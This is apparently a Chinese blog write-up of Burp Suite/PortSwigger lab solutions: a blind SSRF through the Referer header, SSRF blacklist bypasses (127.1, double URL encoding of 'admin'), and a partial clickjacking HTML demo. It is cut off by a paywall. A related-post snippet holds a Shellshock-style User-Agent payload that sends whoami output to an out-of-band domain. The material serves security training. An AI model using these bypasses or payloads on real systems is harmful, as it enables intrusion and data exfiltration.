【Burpsuit靶场记录】(后续题目更新到主页不同的漏洞专题)

原创 已于 2024-07-17 15:32:27 修改 · 964 阅读 · 8
标签
#网络安全
于 2024-02-19 16:26:12 首次发布
本文详细描述了一系列网络安全技术挑战,包括SSRF漏洞利用技巧、业务逻辑漏洞、点击劫持、JWT认证绕过方法以及文件上传漏洞。通过实例展示了如何利用各种技术进行攻击和防御措施的绕过。

Burpsuit靶场记录

SSRF

Blind SSRF with out-of-band detection

前两关的漏洞点出现在检查库存处,本关中没有检查库存功能,根据题解发现漏洞点位于Referer处(长脑子了长脑子了…)
点击一个商品
在这里插入图片描述
burp中抓到如下包
在这里插入图片描述

打开Collaborator,获取一个url
在这里插入图片描述

copy
在这里插入图片描述
将抓到包的Referer值改为copy的url,重新发包
在这里插入图片描述
直接点击poll now能够立马接收到数据,否则默认60s刷新
在这里插入图片描述
这里有个问题,不明白为什么能够利用Referer头进行SSRF利用,挖个坑后面搞懂了填上,评论区有师傅知道的话麻烦指点一下(Respect

SSRF with blacklist-based input filter

一样是检查库存功能点
在这里插入图片描述
直接替换地址已经不行了
在这里插入图片描述
题目提示黑名单,说明限制了url,而localhost和admin都可能被过滤,这里我们一个一个绕过,首先是localhost,表示本机地址,可以用127.0.0.1代替,而127.0.0.1也被限制了
在这里插入图片描述
这时候可以采用的地址有几种,这里只指出本题可以使用的

http://127.1 //省略0
或修改本地hosts文件

在这里插入图片描述

更多绕过方法可以看这篇文章
localhost绕过方法
接下来绕过admin,对字母a经过两次url编码绕过
在这里插入图片描述
为什么两次url编码呢?因为测试一次编码不行。。。。
接下来直接删除即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Clickjacking

Basic clickjacking with CSRF token protection

点击劫持,简单的来说就是用一个透明的iframe调用页面内容,但用户无法察觉,设置一个按钮在被隐藏的按钮位置诱使用户点击。这样说过去确实很抽象,一开始我也不能理解。直接用html演示

<!DOCTYPE html>
<html>
<head>
  <title>Clickjacking测试</title>
  <style>
    #overlay {
     
     
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      opacity: 10; /* 设置为0,使其完全透明 */
      z-index: 9999; /* 确保覆盖在页面上方 */
    }
  </style>
</head>
<body>
  <h1>Clickjacking测试</h1>
  <p>请尝试点击下面的按钮:</p>
	<div style="position:relative;top:360px;left:10px;right:300px;">
	    <button>Click me</button>
	</div>
最低0.47元/天 解锁文章
Wine_Jar
关注
Lab: Cross-site WebSocket hijacking:跨站WebSocket劫持
Zeker62的博客
08-24 1094
目录什么是跨站WebSocket劫持?跨站WebSocket劫持有什么影响?执行跨站点 WebSocket 劫持攻击在本节中,我们将解释跨站 WebSocket 劫持 (CSWSH),描述入侵的影响,并详细说明如何执行跨站点 WebSocket 劫持攻击。 什么是跨站WebSocket劫持? 跨站点 WebSocket 劫持(也称为跨源 WebSocket 劫持)涉及WebSocket 握手上的...
Lab: Basic clickjacking with CSRF token protection:使用CSRF令牌保护的基本点击劫持
Zeker62的博客
08-23 445
靶场内容: 该实验室包含登录功能和受CSRF 令牌保护的删除帐户按钮。用户将点击诱饵网站上显示“点击”一词的元素。 为了解决这个实验,制作一些 HTML 来构建帐户页面并欺骗用户删除他们的帐户。删除帐号后,实验室就解决了。 您可以使用以下凭据登录自己的帐户: wiener:peter 注意 受害者将使用 Chrome,因此请在该浏览器上测试您的漏洞利用。 靶场解决方法 说实话,这就是一个隐...
JWT 为什么总能被伪造?从 Burp Labs 看签名验证、Header 注入与算法混淆
最新发布
renielnxy的博客
03-22 666
JWT 的几类核心攻击面 && Burp Suite JWT练习 && Burp Labs分析
burpsuit 靶场( JWT)
wanan的博客
01-22 2328
burpsuit 靶场( JWT)
PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1648
文章目录总结什么是SSRFSSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
Burp Suite靶场练习——暴力破解(pikache靶场
热门推荐
p36273的博客
06-05 1万+
靶场一共有4关,现我们就开始通关吧。Token 是在服务端产生的。如果前端使用用户名/密码向服务端请求认证,服务端认证成功,那么在服务端会返回 Token 给前端。前端可以在每次请求的时候带上 Token 证明自己的合法地位。如果这个 Token 在服务端持久化(比如存入数据库),那它就是一个永久的身份令牌。Token 完全由应用管理,所以它可以避开同源策略Token 可以避免 CSRF 攻击Token 可以是无状态的,可以在多个服务间共享BurpSuite爆破的几种模式攻击模式。
day3 漏扫工具xray和goby
weixin_65333372的博客
08-29 1577
选择自己适配的版本安装下载解压后在目录下打开cmd,运行查看 xray 的版本号,第一次会报错,报错后目录下会自动更新相关文件,再次运行即可正常查看 xray 的版本号运行。运行命令之后,将在当前文件夹生成 ca.crt和 ca.key两个文件。双击ca.crt,然后按照下图的步骤操作。
实习第三天报告(8.28)
m0_68335509的博客
08-29 1214
漏扫真好玩我真爱玩漏扫
一、Burte Force(暴力破解)
weixin_59584646的博客
07-01 1234
“暴力破解”是一种攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。
实战演练:使用Burp Suite在DVWA环境中进行暴力破解攻击
weixin_28842269的博客
03-15 105
本文详细介绍了如何在DVWA环境中使用Burp Suite进行暴力破解攻击的实战演练。从环境准备、DVWA配置到Burp Suite代理设置,逐步指导如何利用Intruder模块实施高效密码破解,并分享绕过常见防护措施的经验与防御建议,帮助安全测试人员掌握基础渗透测试技能。
websocket host 请求头 怎么填写_浅谈WebSocket跨域劫持漏洞(CSWSH)
weixin_39522486的博客
12-12 738
WebSocket 跨域劫持漏洞WebSocket 跨域劫持漏洞,英文名:Cross-site WebSocket Hijacking,漏洞类型:全能型CSRF(可读、可写)。了解WebSocketWebsocket 优点支持双向通信,实时性更强。更好的二进制支持。较少的控制开销。连接创建后,ws客户端、服务端进行数据交换时,协议控制的数据包头部较小。在不包含头部的情况下,服务端到客户端的包头只有...
JWT攻击详解 --Burp suit官方靶场
m0_60742333的博客
03-23 4393
JWT详解:JSON 网络令牌 (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户的信息(“声明”),作为身份验证、会话处理和访问控制机制的一部分。
Burpsuite官方实验室之点击劫持
tpaer的博客
11-17 3394
这是BurpSuit官方的实验室靶场,以下将记录个人点击劫持共5个Lab的通关过程。
SSRF():PortSwigger靶场笔记
aaaadoga的博客
07-14 1223
该文章是关于作者在PortSwigger的SSRF靶场训练的记录和学习笔记
burpsuit 靶场(Cross-site scripting)
wanan的博客
01-22 2406
burpsuit 靶场(Cross-site scripting)
burpsuit 靶场( HTTP request smuggling)
wanan的博客
01-22 2922
burpsuit 靶场( HTTP request smuggling)
Lab: Manipulating WebSocket messages to exploit vulnerabilities:操纵 WebSocket 消息以利用漏洞...
Zeker62的博客
08-24 530
靶场内容 该在线商店具有使用WebSockets实现的实时聊天功能。 您提交的聊天消息由支持代理实时查看。 要解决实验室问题,请使用 WebSocket 消息alert()在支持代理的浏览器中触发弹出窗口。 漏洞分析 就很奇怪,我在Windows上面的burp就死活抓不到Websocket的包,到kali上就可以搞定 打开live chat 后开启代理进行连接。 先发几段话尝尝鲜,然后发现一件...
(四)Clickjacking-点击劫持
weixin_43047908的博客
04-05 422
什么是点击劫持 Clickjacking是一种基于界面的攻击,其中,通过诱骗用户单击诱饵网站中的某些其他内容,诱骗用户单击隐藏网站上的可操作内容。 考虑以下示例: 网络用户访问诱饵网站(也许这是电子邮件提供的链接),然后单击按钮以赢取奖金。不知不觉中,它们已被攻击者欺骗,诱使他们按下了其他隐藏按钮,从而导致了另一个站点上的帐户付款。这是一个点击劫持攻击的示例。该技术取决于在iframe中包含按钮或隐藏链接的不可见,可操作的网页(或多个页面)的合并。iframe覆盖在用户预期的诱饵网页内容之上。 此攻击与CS
SSRF-bp靶场
qq_53510194的博客
03-26 674
User-agent()输入 { :;/usr/bin/nslookup $(whoami).bp域名 执行命令。1.要求域名必须是stock.weliketoshop.net(常规的请求地址)在另一翻页处(next product),发现类似的path参数,内容为路径。猜测两处公用一个api(stockApi),构造新的stockApi进行测试。@绕过白名单,解码出来的#锁定127.0.0.1。url中的#:<域名>#<位置标识符>url中的@:<用户名>@<域名>找到删除用户的url,改包放包。
BurpSuite】SSRF | Server-side request forgery (1-5)
m0_71944965的博客
09-10 1304
进入靶场发现是一个登录页面 用admin试试发现登录失败 按靶场提示去检查商品库存并抓包找到url将URL更改为访问管理界面 更改url后将抓包发送到 在Response中找到部分 将delete语句放到url中再放行 回到靶场,下图右上角变为即为成功 访问一个产品,点击“检查库存”,在Burp Suite中拦截请求,并发送给Burp Intruder 清除§ 将将 stockApi 更改为http://192.168.0.1:8080/admin 给数字1增加§:点击Add§ 对ip进行爆破:Pay
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值